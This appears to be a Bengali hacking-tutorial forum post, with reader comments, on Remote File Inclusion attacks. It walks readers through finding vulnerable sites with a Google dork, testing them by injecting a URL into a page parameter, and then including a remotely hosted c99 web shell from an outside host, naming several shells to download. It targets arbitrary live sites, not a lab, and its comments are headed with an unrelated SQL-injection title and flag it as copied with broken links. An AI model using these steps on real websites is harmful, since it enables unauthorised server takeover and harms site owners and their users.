Remote File Inclusion হলো বর্তমান সময়ের জনপ্রিয় হ্যাকিং পদ্ধতি গুলোর মধ্যে একটি।
যা ওয়েব এপ্লিকেশনে পাওয়া যায়।
এই ধরনের দুর্বলতাকে ব্যাবহার করে হ্যাকার দুর্বল সাইটটির সার্ভারে ফাইল এড/যোগ করতে পারে।
যদি হ্যাকার সফল ভাবে এই কাজটি করতে সক্ষম হয় তাহলে সে সেই দুর্বল সাইটটি কে হ্যাক করতে পারবে।
এবং তার সাথে সাথে সার্ভারটি ও হ্যাক করা সম্ভব।
সাধারনত এই টাইপের দুর্বলতা গুলো এই ধরনের সাইটে থাকে যেই সাইট গুলোর লিঙ্ক গুলো এরকম হয়।
উদাহারণঃ http://www.Targetsite.com/index.php?page=index.php
এই দুর্বলতাটি তে দুর্বল সাইট বের করার জন্যে সবচেয়ে বেশী কার্যকর google dork হচ্ছে
“inurl:index.php?page=”
এই Dork টি index.php?page ইউআরএলের যত সাইট আছে সব গুলো আপনাকে রেসাল্টে দেখাবে।
যেকোনো একটি সাইটে প্রবেশ করুন এবং সাইটটি দুর্বল নাকি চেক করার জন্যে
?page= এর পর www.google.com এড করে এন্টার চাপুন।

উদাহারণঃ www.targetsite.com/index.php?page=www.google.com

যদি মনে করেন ওয়েবসাইট টি হয় http://example.com/v2/index.php?page=index.php
তাহলে কোড দেওয়ার পর লিঙ্কটি হবে এরকমঃ
http://www.example.com/v2/index.php?page=http://google.com/
যদি সাইটটি এখন গুগলে রিডাইরেক্ট করে।
মানে যদি আপনি এই লিঙ্কে যাওয়ার পর দেখতে পান যে গুগল দেখা যাচ্ছে তাহলে সাইট টি দুর্বল।
যদি না আসে।। তাহলে আরেকটি সাইট খুজে বের করেন!
এরপরে।। এখন কাজ হলো হ্যাকিং শেল আপলোড দেওয়া।
শেল ডাউনলোড করার জন্যে গুগল করতে পারেন।
(madspot shell download)(wso shell download)
(b347k shell download)
Etc…
যায় হোক LFI এর জন্যে আমাদের শেল ডাউনলোড করা লাগবে না।
শেল আপলোড করা আছে এমন কোনো হোস্টিং থাকলেয় চলবে
সেটার জন্যে গুগলে সার্চ করুন।
c99 shell.txt

http://www.c99txt.net/s/c99.txt (শেল লিঙ্ক)
এখন শেল আপলোড করার জন্যে লিঙ্কটি হবে।
http://www.vuln.rfisite.com/v2/index.php?page=http://www.c99txt.net/s/c99.txt

ধন্যবাদ আশা করি সবাই বুঝতে পেরেছেন।
My website

7 thoughts on "Sql injection bangla part 2 (last part )"

    1. Deepraj Author Post Creator says:
      Why bro ?
  1. S Contributor says:
    রিপোর্টে করেছি যাতে আপনি সতর্ক হোন এবং আমাদের আরো ভালো পোস্ট উপহার দেন । কিছু মনে করবেন না ভাই। সাপোর্ট টিম আপনার পোস্টটি চেক করে দেখবেন।
    Cause for report : Copy post + no screenshot + broken link
    1. Deepraj Author Post Creator says:
      Ok I will try
    2. S Contributor says:
      ❤️
  2. Hassan Contributor says:
    Shell upload korbo kemne??
  3. THE JOB Nafi Contributor says:
    Carding oo ki SQL Injection er maddhome hy??

Leave a Reply